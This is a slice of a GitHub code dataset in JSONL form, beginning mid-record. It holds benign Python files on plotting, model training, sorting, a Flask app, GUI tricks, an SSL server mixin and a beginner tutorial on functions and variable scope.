timedelta(days=event['day'] - (now.weekday() + 1))\n event_date = event_date.replace(hour=int(event['hour']), minute=int(event['minute']))\n\n diff = event_date.timestamp() - now.timestamp()\n if diff < 0:\n diff = SECONDS_IN_WEEK + diff\n\n if diff < min_diff:\n min_diff = diff\n\n return now.timestamp() + min_diff\n","repo_name":"pznkDev/Releaser","sub_path":"app/views/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43321751185","text":"\r\n\r\n###############\r\n# Authored by Weisheng Jiang\r\n# Book 6 | From Basic Arithmetic to Machine Learning\r\n# Published and copyrighted by Tsinghua University Press\r\n# Beijing, China, 2022\r\n###############\r\n\r\nimport numpy as np\r\nimport scipy.stats as st\r\nimport statsmodels.api as sm\r\nimport matplotlib.pyplot as plt \r\nimport pandas as pd \r\nfrom sklearn.datasets import load_iris\r\n\r\nplt.close('all')\r\n\r\niris = load_iris()\r\n# A copy from Sklearn\r\n\r\nX = iris.data\r\nx = X[:, 0]\r\ny = X[:, 1]\r\n\r\n\r\nxmin, xmax = 4, 8\r\nymin, ymax = 1, 5\r\n\r\n# Perform the kernel density estimate\r\nxx, yy = np.mgrid[xmin:xmax:100j, ymin:ymax:100j]\r\npositions = np.vstack([xx.ravel(), yy.ravel()])\r\nvalues = np.vstack([x, y])\r\nkernel = st.gaussian_kde(values)\r\nPDF_xy = np.reshape(kernel(positions).T, xx.shape)\r\n\r\n\r\nfig, ax = plt.subplots(subplot_kw={'projection': '3d'})\r\n\r\nax.plot_wireframe(xx,yy, PDF_xy, \r\n rstride=4, cstride=4,\r\n color = [0.5,0.5,0.5],\r\n linewidth = 0.25)\r\n\r\n\r\ncolorbar = ax.contour(xx,yy, PDF_xy,20,\r\n cmap = 'RdYlBu_r')\r\n\r\nfig.colorbar(colorbar, ax=ax)\r\n\r\nax.set_xlabel('Sepal length, $X_1$')\r\nax.set_ylabel('Sepal width, $X_2$')\r\nax.set_zlabel('$f_{X1,X2}(x_1,x_2)$')\r\n\r\nax.set_proj_type('ortho')\r\n# ax.set_xticks([])\r\n# ax.set_yticks([])\r\n# ax.set_zticks([])\r\nax.view_init(azim=-135, elev=30)\r\nax.grid(False)\r\nax.set_xlim(xx.min(), xx.max())\r\nax.set_ylim(yy.min(), yy.max())\r\n# ax.set_zlim(0, 0.7)\r\nplt.tight_layout()\r\n\r\nplt.show()\r\n\r\n\r\nfig = plt.figure()\r\nax = fig.gca()\r\nax.set_xlim(xmin, xmax)\r\nax.set_ylim(ymin, ymax)\r\n\r\n# Contourf plot\r\ncfset = ax.contourf(xx, yy, PDF_xy, cmap='Blues')\r\ncset = ax.contour(xx, yy, PDF_xy, colors='k')\r\nplt.scatter(x,y,marker = 'x')\r\n\r\n# Label plot\r\nax.clabel(cset, inline=1, fontsize=10)\r\nax.set_xlabel('Sepal length, $X_1$')\r\nax.set_ylabel('Sepal width, $X_2$')\r\nplt.gca().set_aspect('equal', adjustable='box')\r\nplt.show()\r\n","repo_name":"Visualize-ML/Book5_Essentials-of-Probability-and-Statistics","sub_path":"Book5_Ch17_Python_Codes/Bk5_Ch17_04.py","file_name":"Bk5_Ch17_04.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":1797,"dataset":"github-code","pt":"31"} +{"seq_id":"45939161624","text":"import json\nfrom pathlib import Path\n\nfrom create_music.linear_model import helper_functions\nimport torch\nfrom torch import nn\nfrom torch import optim\nfrom torchvision import transforms\n\n\nfolder = Path('../music')\ndevice = 'cpu'\nsample_length = 32768\nmodel_name = 'music_creation'\nmetadata_file = 'lofi'\nconfig_file = Path(f'models/{metadata_file}/metadata{model_name}.json')\nepochs_to_run = 1600\nsave_every = 400\nsamplerate = 16000\n\ntransformations = transforms.transforms.Compose([\n transforms.transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n])\n\ntrain_loader = torch.utils.data.DataLoader(\n helper_functions.SongIngestion(Path(folder),\n length=sample_length,\n transformations=transformations,\n sr=samplerate),\n batch_size=16)\n\nif config_file.exists():\n with open(f'models/{metadata_file}/metadata{model_name}.json', 'r') as outfile:\n metadata = json.load(outfile)\n\n for key, value in metadata.items():\n if 'path' in value:\n model_path = value['path']\n starting_iteration = int(key)\n\n model = torch.load(model_path)\nelse:\n model = helper_functions.LinearNN(inputs=len(train_loader.dataset),\n final_length=sample_length)\n metadata = {}\n starting_iteration = 0\n\n\noptimizer = optim.SGD(model.parameters(), lr=0.05, momentum=0.9)\ncriterion = nn.L1Loss()\nmodel.to(device)\n\nsteps = 0\nrunning_loss = 0\ntrain_losses = []\ntest_losses = []\naccuracies = []\n\nfor epoch in range(epochs_to_run):\n running_loss = 0\n epoch = starting_iteration + epoch\n model.train()\n for results, inputs in train_loader:\n steps += 1\n inputs, results = inputs.to(device).float(), results.to(device)\n optimizer.zero_grad()\n logps = model(inputs)\n loss = criterion(logps.squeeze(1), results.type_as(logps))\n loss.backward()\n optimizer.step()\n running_loss += loss.item()\n\n train_losses.append(running_loss)\n print(f\"Epoch {epoch + 1}/{epochs_to_run + starting_iteration}.. \"\n f\"Train loss: {running_loss:.3f}.. \")\n\n save_path = f'models/{metadata_file}/music_creation_{model_name}_{epoch + 1}.pth'\n metadata[epoch + 1] = {\n 'running_loss': running_loss / len(train_loader.dataset),\n }\n\n if epoch % save_every == save_every - 1:\n Path(save_path).parent.mkdir(exist_ok=True, parents=True)\n metadata[epoch + 1]['path'] = save_path\n torch.save(model, save_path)\n\n with open(config_file, 'w') as outfile:\n json.dump(metadata, outfile)\n","repo_name":"EchoDel/data_science_experiments","sub_path":"create_music/linear_model/build_network.py","file_name":"build_network.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"34885026263","text":"#from pydoc import help\nimport scipy\nfrom scipy.stats.stats import pearsonr\n\nfrom rpy2.robjects.packages import importr\nfrom rpy2.robjects.vectors import FloatVector\n\nstats = importr('stats')\n\nimport csv\n\nbase_dir = \"/Users/timrpeterson/OneDrive-v2/Data/MORPHEOME/FOR_PAPER/Figure2-introduce-morpheome/\"\n\nsql_tables = [\n\t\"intersect_HURI_depmap_2020q2_python.csv\",\n\t\"intersect_HURI_depmap_2019q4_python.csv\",\n\t\"intersect_HURI_depmap_qbf_Avanadata_2018_python.csv\",\n\t\"intersect_HURI_depmap_2019q2_python.csv\",\n\t\"intersect_HURI_Achilles_RNAi_python.csv\", \n\t\"intersect_bioplex_depmap_2020q2_python.csv\", \n\t\"intersect_bioplex_depmap_2019q4_python.csv\",\n\t\"intersect_bioplex_depmap_qbf_Avanadata_2018_python.csv\",\n\t\"intersect_bioplex_depmap_2019q2_python.csv\", \n\t\"intersect_bioplex_Achilles_RNAi_python.csv\", \n]\n\nppi_sig = {}\n\nfor file in sql_tables:\n\n\twith open(base_dir + file) as csv_file:\n\t\tcsv_reader = csv.reader(csv_file, delimiter=',')\n\n\t\tfor row in csv_reader:\n\n\t\t\tgene_pair = row[0].split('-')\n\t\t\tgene_pair.sort()\n\n\t\t\tif gene_pair[0] == gene_pair[1]: continue\n\n\t\t\tgene_pair = gene_pair[0] + '-' + gene_pair[1]\n\n\t\t\tif gene_pair not in ppi_sig:\n\t\t\t\t\n\t\t\t\tppi_sig[gene_pair] = {'pearsons' : [row[1]], 'pval' : [row[2]]}\n\n\t\t\telse:\n\n\t\t\t\tppi_sig[gene_pair]['pearsons'].append(row[1])\n\t\t\t\tppi_sig[gene_pair]['pval'].append(row[2])\n\t\t\t\t\n\noutput2 = []\nfor key, value in ppi_sig.items():\n\n\t#if len(value[\"pearsons\"])!=len(genes)*len(datasets): continue\n\n\tp_adjust = stats.p_adjust(FloatVector(value[\"pval\"]), method = 'BH')\n\tpval = scipy.stats.stats.combine_pvalues(p_adjust)\n\n\tresult = (sum(value[\"pearsons\"])/len(value[\"pearsons\"]), pval[1])\n\n\toutput2.append(list((key,) + result)) \n\n#sort the output desc\noutput3 = sorted(output2, key=lambda x: x[1], reverse=True)\n\nwith open(base_dir + 'merge_ppi_depmap_data-python.csv', 'w') as csvfile:\n\tspamwriter = csv.writer(csvfile, delimiter='\\t')\n\n\tfor row in output3:\n\t\tspamwriter.writerow(row)\n\n\tcsvfile.close()","repo_name":"tim-peterson/morpheome_chpc_prep_data","sub_path":"py/figure2/merge_ppi_depmap_data.py","file_name":"merge_ppi_depmap_data.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35797544206","text":"import ssl\n\nclass SSLMixin:\n def __init__(self, *args, \n keyfile=None, certfile=None, ca_certs=None, cert_reqs=ssl.CERT_NONE,\n **kwargs):\n self._keyfile = keyfile\n self._certfile = certfile\n self._ca_certs = ca_certs\n self._cert_reqs = cert_reqs\n super().__init__(*args, **kwargs)\n\n def get_request(self):\n client, addr = super().get_request()\n client_ssl = ssl.wrap_socket(client,\n keyfile = self._keyfile,\n certfile = self._certfile,\n ca_certs = self._ca_certs,\n cert_reqs = self._cert_reqs,\n server_side = True)\n return client_ssl, addr\n \n \n\n \n \n","repo_name":"dabeaz/python-cookbook","sub_path":"src/11/adding_ssl_to_network_servers/sslmixin.py","file_name":"sslmixin.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":3796,"dataset":"github-code","pt":"31"} +{"seq_id":"19684449585","text":"# 与えられた文字列の各文字を,以下の仕様で変換する関数cipherを実装せよ.\n# 英小文字ならば(219 - 文字コード)の文字に置換\n# その他の文字はそのまま出力\n# この関数を用い,英語のメッセージを暗号化・復号化せよ.\nimport string\n\n\ndef cipher(sentence):\n alp = string.ascii_lowercase\n\n return \"\".join([chr(219 - ord(letter)) if letter in alp else letter\n for letter in sentence])\n\n\nsentence = \" Float like a butterfly, die like a bee !! --Enrico Maxwell--\"\nprint(\"sentence = \\n\", sentence)\nprint(\"ciphered = \\n\", cipher(sentence))\n","repo_name":"cdlab-sit/100knock","sub_path":"Sota222/08_short.py","file_name":"08_short.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70561390488","text":"def fib_non_cps (n): # takes forever but no rekursion depth error\n return 1 if n < 2 else fib_non_cps(n-1) + fib_non_cps(n-2) # not tail recursive, because rekursion in opperant positions\n\n# def fib_cps(n, k): # rekursion depth error: max n = 12\n# if n<2:\n# return k(1)\n# else:\n# return fib_cps(n-1, lambda left: fib_cps(n-2, lambda right : k(left + right))) # operant liegt ganz 'innen', pro rekursiv aufruf ein lambda\n \n\ndef fib_cps(n, k): # fixes rekursion depth problem BUT WHY\n if n < 2:\n return k(1)\n else:\n return lambda: fib_cps(\n n - 1,\n lambda left:\n lambda: fib_cps(\n n - 2,\n lambda right:\n lambda: k(left + right)))\n \ndef trampoline(f, *args):\n v = f(*args)\n while callable(v):\n v = v()\n return v\n \nprint(trampoline(fib_cps, 30, lambda value: value))\n","repo_name":"CelinaO0o/CPS_Bachelor_Project","sub_path":"python/cpsfib.py","file_name":"cpsfib.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42192171850","text":"# from distutils.log import debug\nimport os\nimport model_load\nfrom flask import Flask, render_template, request\n\n\n\napp = Flask(__name__) \n\n\n@app.route(\"/\")\ndef home():\n return render_template('index.html')\n\n@app.route('/success', methods = ['POST']) \ndef submission(): \n if request.method == 'POST':\n f = request.form.get('text_box')\n f_path = f\n p = model_load.predict_label(f_path)\n return render_template(\"success.html\", prediction = p, f_path=f_path)\n else: \n return 'Something went wrong' \n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n","repo_name":"Saidkarim2000/Disaster-Sentence-Predictor","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"70145359768","text":"from tkinter import Tk, Canvas\nfrom PIL import Image, ImageTk\nfrom math import atan2, degrees\n\nroot = Tk()\ncanv = Canvas(root, width=800, height=600, background=\"white\")\ncanv.pack()\ncanv.update()\nw = canv.winfo_width()\nh = canv.winfo_height()\n\nmouseCoords = [w, h / 2]\narrowObj = 0\nangle = 0\n\nimg = Image.open(\"arrow.png\")\nimgTk = ImageTk.PhotoImage(img)\n\n\ndef updateAngle(x, y):\n global angle\n dy = (\n y - h / 2\n ) # considers the origin to be the middle of the screen and not (0,0) by offsetting\n dx = x - w / 2\n angle = atan2(dy, dx) # atan2 takes in coords and returns an angle\n\n\ndef drawArrow():\n global imgTk, arrowObj\n imgTk = ImageTk.PhotoImage(\n img.rotate(degrees(-angle))\n ) # Have to do -angle. img.rotate() probably rotates clockwise.\n if arrowObj == 0:\n arrowObj = canv.create_image(w / 2, h / 2, image=imgTk)\n else:\n canv.itemconfig(arrowObj, image=imgTk)\n # Note: By using itemconfig, you can skip two steps:\n # 1. Deleting objects\n # 2. Updating Canvas\n # (actually updating canvas from event causes recursion\n # for some reason and causes the program to crash eventually)\n\n\ndef handleMouseEvent(event):\n updateAngle(event.x, event.y)\n drawArrow()\n\n\nroot.bind(\n \"\", handleMouseEvent\n) # Whenever the mouse moves, handleMouseEvent is called\n\nroot.mainloop()\n","repo_name":"kertox662/PythonPackageInstaller","sub_path":"examples/PIL_Examples/MouseFollower/mouseFollower.py","file_name":"mouseFollower.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"34680492029","text":"\"\"\"\nВ первой строке задано два целых числа 500001≤n≤50000 и 500001≤m≤50000\n— количество отрезков и точек на прямой, соответственно.\nСледующие n строк содержат по два целых числа ai и bi — координаты концов отрезков.\nПоследняя строка содержит m целых чисел — координаты точек.\nВсе координаты не превышают 10^8 по модулю.\nТочка считается принадлежащей отрезку, если она находится внутри него или на границе.\nДля каждой точки в порядке появления во вводе выведите, скольким отрезкам она принадлежит.\n\"\"\"\n\nimport sys\n\n\ndef quick_sort_partition(arr, low, high):\n if low >= high:\n return arr\n else:\n random_index = (low + high) // 2\n arr[low], arr[random_index] = arr[random_index], arr[low]\n pivot_index = low + 1\n equals_counter = 0\n for i in range(low + 1, high + 1):\n if arr[i] < arr[low]:\n arr[pivot_index], arr[i] = arr[i], arr[pivot_index]\n arr[pivot_index - equals_counter], arr[pivot_index] = arr[pivot_index], arr[\n pivot_index - equals_counter]\n pivot_index += 1\n elif arr[i] == arr[low]:\n arr[pivot_index], arr[i] = arr[i], arr[pivot_index]\n\n equals_counter += 1\n pivot_index += 1\n arr[low], arr[pivot_index - equals_counter - 1] = arr[pivot_index - equals_counter - 1], arr[low]\n equals_counter += 1\n\n less_high = pivot_index - equals_counter - 1\n greater_low = pivot_index\n arr = quick_sort_partition(arr, low, less_high)\n arr = quick_sort_partition(arr, greater_low, high)\n\n return arr\n\n\ndef binary_search_less(arr, elem_needed, low, high):\n if low > high:\n return low\n else:\n mid = (high + low) // 2\n if elem_needed < arr[mid]:\n high = mid - 1\n return binary_search_less(arr, elem_needed, low, high)\n elif elem_needed > arr[mid]:\n low = mid + 1\n return binary_search_less(arr, elem_needed, low, high)\n else:\n counter = 0\n for i in range(mid, high + 1):\n if arr[i] == elem_needed:\n counter += 1\n else:\n break\n return mid + counter\n\n\ndef binary_search_less_strictly(arr, elem_needed, low, high):\n if low > high:\n return low\n else:\n mid = (high + low) // 2\n if elem_needed < arr[mid]:\n high = mid - 1\n return binary_search_less_strictly(arr, elem_needed, low, high)\n elif elem_needed > arr[mid]:\n low = mid + 1\n return binary_search_less_strictly(arr, elem_needed, low, high)\n else:\n counter = 0\n for i in range(0, mid - low + 1):\n if arr[mid - i] == elem_needed:\n counter += 1\n else:\n break\n return mid + 1 - counter\n\n\nsegments, points = map(int, input().split())\na_ends = [0] * segments\nb_ends = [0] * segments\nfor segment in range(segments):\n a_ends[segment], b_ends[segment] = map(int, input().split())\n\na_ends_sorted = sorted(a_ends)\nb_ends_sorted = sorted(b_ends)\n\npoints_arr = sys.stdin.read().split()\npoints_n_segments = []\n\nfor i in range(points):\n c = int(points_arr[i])\n len_a = binary_search_less(a_ends_sorted, c, 0, segments - 1)\n len_b = binary_search_less_strictly(b_ends_sorted, c, 0, segments - 1)\n points_n_segments.append(len_a - len_b)\n\nprint(*points_n_segments)\n","repo_name":"Egor-Sidorov/Algorithmic_tasks","sub_path":"Quick_Sort.py","file_name":"Quick_Sort.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27175300571","text":"#Desafio: Criando um sistema bancário\n\n\"\"\" Objetivo Geral\n Criar um sistema bancário com as operações: sacar, depositar\n e visualizar extrato. \"\"\"\n\nprint(\"Seja bem vindo ao Banco ABC\")\n\nmenu = \"\"\"\n=====|Digite a opção desejada:|===\n\n[d] Depositar\n[s] Sacar\n[e] Extrato\n[q] Sair\n=> \"\"\"\n\nsaldo = 0\nlimite = 500\nextrato = \"\"\nnumero_saques = 0\nLIMITE_SAQUES = 3\n\n\nwhile True:\n\n opcao = input(menu)\n\n if opcao == \"d\":\n\n deposito = float(input(\"Qual o valor deseja depositar:\"))\n\n if deposito > 0:\n saldo = saldo + deposito\n extrato = extrato + \" \\nDepósito: R$ {:.2f}\".format(deposito)\n \n\n if opcao == \"s\":\n\n if numero_saques >= LIMITE_SAQUES:\n print(\"Número de Saques diários excedido, favor tentar novamente amanhã\")\n\n else:\n saque = float(input(\"Qual o valor deseja sacar:\"))\n\n numero_saques = numero_saques + 1\n\n if saque <= limite:\n if saque <= saldo:\n saldo = saldo - saque\n extrato= extrato + \" \\nSaque: R$ {:.2f}\".format(saque)\n\n else:\n print(\"Não possui saldo suficiente, seu saldo atual é de {:.2f}\".format(saldo))\n \n else:\n print(\"Limite de saques excedido, favor tentar um valor menor R$ {}\".format(limite))\n\n if opcao == \"e\":\n print(\"==\"*5,\"extrato\",\"==\"*5)\n print(extrato)\n print(\"\\nO saldo atual é: R$ {:.2f}\".format(saldo))\n print(\"==\"*12)\n\n if opcao == \"q\":\n print(\"Obrigado, volte sempre!\")\n break\n \n elif opcao != \"d\" and opcao != \"s\" and opcao != \"e\" and opcao != \"q\":\n print(\"Operação inválida,por favor selecione novamente a operação desejada\")\n \n\n","repo_name":"ijovanycecilio/Projects_Python","sub_path":"Banking_system.py","file_name":"Banking_system.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"45888463194","text":"#!/usr/bin/env python\nimport os\nimport logging\n\n#logging.basicConfig(level=logging.DEBUG, filename=\"logs.data\", filemode=\"w\")\n#logger = logging.getLogger(__name__)\n\ndef parse_nautilus_environment():\n result = {\n 'NAUTILUS_SCRIPT_SELECTED_FILE_PATHS' : [],\n 'NAUTILUS_SCRIPT_SELECTED_URIS' : [],\n 'NAUTILUS_SCRIPT_CURRENT_URI' : [],\n 'NAUTILUS_SCRIPT_WINDOW_GEOMETRY' : []\n }\n for i in result.keys():\n if os.environ.has_key(i):\n result[i] = os.environ[i].split(':')\n else:\n result[i] = []\n return result\n\ndef open_terminal(result):\n\tpath = result['NAUTILUS_SCRIPT_CURRENT_URI'][1][2:]\n\tpath = path.replace(\"%20\", \" \")\n\t#logger.debug(path)\n\t#os.system(\"zenity --info --text '%s'\"%path)\n\tos.system(\"/usr/bin/gnome-terminal --working-directory='%s'\" %path)\n\nopen_terminal(parse_nautilus_environment())\n","repo_name":"vishvendra01/UtilityScripts","sub_path":"open_terminal.py","file_name":"open_terminal.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"44215202492","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## What is Function?\n# \n# If a group of lines is required frequently, it is not advised to write them separately each time. These statements must be defined as a single unit, which we may call any number of times based on our requirements without having to rewrite. This is called function. \n# \n# Functions are also called as methods, procedures, and subroutines\n\n# ## Advantage\n# Code reuse. \n# \n\n# # Types of functions\n# 1. Built-in Features \n# 2. Customized Functions\n# \n\n# # Built in Functions\n# Built-in functions or pre-defined functions are functions that are automatically included with Python programme.\n# \n# For instance, print(), max(), pow(), input() etc.\n# \n# Python 3, there are 68 built-in functions\n\n# # User defined functions \n# User defined functions are functions that are written explicitly according to requirements by programmers\n\n# In[51]:\n\n\n#Syntax to create user defined functions\n\"\"\" \ndef function_name(parameters) : \n ---- ----- \n ---- -----\n return value(s) # Optional\n\"\"\"\n\n\n# In[4]:\n\n\n\"\"\"Write a function to print \"Humanity Above All\"\"\"\n# Function definition\ndef myFunction(): \n print(\"Humanity Above All\") \n\n#myFunction()\n\n# Function call\nfor _ in range(5):\n myFunction()\n\n\n# # Parameters\n# Parameters are the function's inputs. If a function has parameters, we must specify values when invoking the function; otherwise, we will receive an error.\n\n# In[5]:\n\n\n\"\"\" Function Example 1\"\"\"\ndef myFunction(name): # \"name\" is the formal parameter\n print(\"Hi!\",name,\" How are you?\") \n # Default return value is None\n \nmyFunction(\"Kapil\") # Kapil is the actual parameters, call a function.\nmyFunction(\"Rani\")\n\n\n# In[8]:\n\n\n\"\"\" Function Example 2\"\"\"\ndef myFunction(x): # 'x' is the formal parameter\n print(\"Square of the\",x,\"is: \", x**2) \n # Default return value is None\n \nmyFunction(5) # 5 is the actual parameters\nmyFunction(19)\n\n\n# In[14]:\n\n\n\"\"\" Function Example 3: define and passing two parameters\"\"\"\ndef addSquare(x,y): # x and y are the formal parameter\n return x**2 + y**2\n\n# Case 1\nprint(\"Case1: The result is: \",addSquare(5,5)) # Function call\n\n#Case 2\nz = addSquare(2,9)\nprint(\"Case2: The result is: \",z) # Function call\n\n\n# In[9]:\n\n\n\"\"\" Function Example 4 (returning a variable)\"\"\"\ndef addSquare(x,y): \n w = x**2 + y**2\n return w # Variable returning\n\nprint(\"Case 1 result: \",addSquare(2,3)) # Case 1\n\nz = addSquare(6,3) #Case 2\nprint(\"Case 2 result: \",z)\n\n\n# In[11]:\n\n\n\"\"\"Example 5: More than one return values\"\"\"\ndef add_sub_mul_Function(x, y): \n mySum = x + y\n mySub = x - y \n myMul = x*y \n return mySum, mySub, myMul # Return more than one variables\n\naSum, bSub, cMul = add_sub_mul_Function(9, 3) \n# Receiving more than one variables\n\nprint(\"The Sum is :\", aSum) \nprint(\"The Subtraction is :\", bSub)\nprint(\"The multiplication is: \",cMul) \n\n\n# # Types of actual parameters\n# 1. positional \n# 2. keyword \n# 3. default \n# 4. variable length\n\n# # 1. Positional parameters\n# Correct positional order must be maintained\n\n# In[14]:\n\n\n\"\"\" 1. Positional parameters\"\"\"\ndef positionalFunction(x,y): # Normal argument: matched by position\n print(x,\" to the power\", y, \"is: \",x**y)\n\npositionalFunction(2, 3)\npositionalFunction(3, 2)\n\n\n# # Notes on Positional parameters\n# 1. The number of parameters and position of parameters must be the same. \n# 2. If the orders of the parameters are changed, the outcome may be altered.\n# 3. We will get an error if we vary the number of parameters.\n\n# In[17]:\n\n\n\"\"\"Positional parameters\"\"\"\ndef positionalFunction(x,y): \n print(x,\" to the power\", y, \"is: \",x**y)\n\npositionalFunction(2, 3)\n#positionalFunction(2, 3, 5)\n\n\n# # Keyword Parameters\n# We can pass parameter values by keyword i.e., by parameter's name. The sequence of the parameter does not matter, but the number of parameters must be equal.\n\n# In[20]:\n\n\n\"\"\"keyword Parameters\"\"\"\ndef keywordFunction(x,y): \n print(x,\" to the power\", y, \"is: \",x**y)\n\nkeywordFunction(x = 2, y = 3) #Keyword parameters: matched by name\n#keywordFunction (y = 3, x = 2)\n#keywordFunction (y = 3, x = 2, z = 1)\n\n\n# Both positional and keyword parameters can be used at the same time. \n# However, we must take positional parameters first, followed by keyword parameters, else we will get a syntax error.\n# \n\n# In[23]:\n\n\ndef pkFunction(x,y):\n print(x,\" to the power\", y, \"is: \",x**y)\n\npkFunction(2, 3)\npkFunction(2, y = 3)\n#positionalFunction(x = 2, 3)\n\n\n# # Default Parameters\n# For our positional parameters, we can sometimes assign default values.\n\n# In[29]:\n\n\n\"\"\"Default Parameters\"\"\"\n\ndef defaultPFunction(x = 3, y = 2):\n print(x,\" to the power\", y, \"is: \",x**y)\n\ndefaultPFunction() # 3^2\ndefaultPFunction(2) # 2^2\ndefaultPFunction(2, 3) # 2^3\ndefaultPFunction(2, y = 3) # 2^3\n#defaultPFunction(x = 2, y = 3) # 2^3\n#defaultPFunction(y = 3, 5)\n\n\n# # Variable length parameters\n# 1. In variable length parameters, we may provide variable number of parameters. \n# 2. The * symbol can be used to define a variable length parameter.\n\n# In[36]:\n\n\n\"\"\"Example of variable length parameters\"\"\"\ndef variablePF(*N): \n mulv = 1\n print(\"The received value: \",N)\n print(\"Number of received parameters: \", len(N))\n for n in N: \n mulv *= n \n \n print(\"The multiplication value is: \",mulv) \n \n#variablePF() # No parameter\n#variablePF(10) \nvariablePF(4,3) \n#variablePF(range(10)) \n\n\n# # Mixing variable length parameter with positional parameter.\n\n# In[42]:\n\n\n\"\"\" Example 1: Mixing variable length param. with positional param\"\"\"\ndef variablePF(data, *N): \n mulv = data\n print(\"data is: \",data,\", N is: \", N)\n \n for n in N: \n mulv *= n \n\n print(\"The multiplication value is: \",mulv) \n\n#variablePF (2) \n#variablePF (3, 4) \nvariablePF (3, 4, 5, 8, 9, 10) \n#variablePF (2, 4, data = 5) \n#variablePF (data = 2, 4, 5)\n\n\n# In[47]:\n\n\n\"\"\" Example 2: Mixing variable length param. with default values param\"\"\"\ndef variablePF(*N, data = 1): \n mulv = data\n print(\"data is: \",data,\", N is: \", N)\n for n in N: \n mulv *= n \n\n print(\"The multiplication value is: \",mulv) \n\n#variablePF (2) # Default value of data is 1, N is: (2,)\n#variablePF (3, 4) # Default value of data is 1, N is: (3,4)\n#variablePF (2, 4, 5) # Default value of data is 1, N is: (2, 4, 5) \nvariablePF (2, 4, data = 5) # Here the value of data is 5, N is: (2, 4)\n#variablePF (data = 5, 4, 5, 7)\n\n\n# # key word variable length parameters\n# Use **. Internally these keyword are stored as dictionary.\n\n# In[52]:\n\n\n\"\"\" key word variable length parameters\"\"\"\ndef vlkParameters(**kwargs):\n for key, value in kwargs.items(): \n print(key, \":\", value)\n\n#vlkParameters(PI = 3.14)\n#vlkParameters(Name = \"Kapil\", Address = \"Chandigarh\") \nvlkParameters(a=1,b=9,c=7)\n\n\n# In[54]:\n\n\n# use positional, *args and **kwargs togethor\ndef examplePAK(a, b, *args, **kwargs):\n print(\"The values of postional parameters are: \",a,\",\",b)\n sum =0\n for i in args:\n sum +=i\n print(\"The sum of variable length parameters is: \",sum)\n \n #print(kwargs)\n for j in kwargs.items():\n print(\"The key word values are: \",j)\n \n#examplePAK(2,3, 10, 11, 12, x = \"Great\", y = \"Goal\") # Function call\nexamplePAK(7,9, 10, 11, 12, 15, 17, x = \"God\", y = \"is\", z = \"Great\") # Function call\n\n\n# # Difference between Function, Module, Library\n# 1. A set of lines saved with name is called a function. \n# 2. A module consists of set of functions. \n# 3. A library consists of set of modules.\n\n# # Types of variables\n# 1. Global Variables\n# 2. Local Variables\n\n# # Global Variables \n# Global variables are variables that are defined outside of a \n# function. All functions in that module can access these variables\n\n# In[57]:\n\n\n\"\"\"Example of global variable\"\"\"\nPI = 3.14\ndef globalVFunction1():\n print(\"The value of PI in F1\",PI)\n\ndef globalVFunction2():\n print(\"The value of PI in F2\",PI)\n\nglobalVFunction1()\nglobalVFunction2()\n\n\n# Notes on local variables\n# 1. Local variables are variables that are declared within a function.\n# 2. These are only available in the function where they were \n# declared. \n# 3. We can't access it from outside the function.\n\n# In[58]:\n\n\n\"\"\"Example of local and global variables\"\"\"\nA = 10\ndef VFunction1():\n A = 20\n print(\"F1: Print local value: \",A)\n\ndef VFunction2():\n print(\"F2: Print global value\",A)\n\nVFunction1() \nVFunction2()\n\n\n# In[61]:\n\n\n\"\"\" global key word\"\"\"\nA = 10\ndef VFunction1():\n global A\n A = 20\n print(\"F1: Print local value: \",A)\n\ndef VFunction2():\n print(\"F2: Print global value: \",A)\n\nVFunction1() \nVFunction2()\n\n\n# In[63]:\n\n\n\"\"\" Accessing global variable and suppressing local variables\"\"\"\nA = 50\ndef VFunction1():\n A = 20 # Local variables\n print(\"F1: Print local value: \",A) # Local value\n print(\"F1: This is global value: \",globals()['A']) # suppressing local variables\n\ndef VFunction2():\n print(\"F2: Print global value: \",A)\n\nVFunction1() \nVFunction2()\n\n\n# In[65]:\n\n\nvar1 = 10\n\ndef localF():\n var1 = 50\n print(\"Print the local variable: \",var1)\n \nprint(\"Print the global variable: \",var1)\nlocalF()\nprint(\"Print the global variable: \",var1)\n\n\n# In[67]:\n\n\nvar = 11\ndef myF():\n global var # Declare global \n var += 1\n print(\"Print the variable: \",var)\n\nprint(\"Print the variable: \",var)\nvar +=1\nmyF()\n\n\n# In[68]:\n\n\nvar = 10 # outer global variable global\ndef myF1():\n var = 13 # inner global variable\n\n def myF2():\n print(\"Inner global is printed: \",var) \n # Print variables defined inside the parent function\n myF2()\n \nmyF1()\nprint(\"Inner global is printed: \",var) \n\n\n# In[70]:\n\n\n# Examples: Is forward reference okay? \ndef myf1():\n val = 30 \n myf2(val) # Forward reference okay\n\ndef myf2(val):\n print(\"The value is: \",val)\n\nmyf1()\n\n\n# # The nonlocal keyword \n# It's used to work with variables inside nested functions 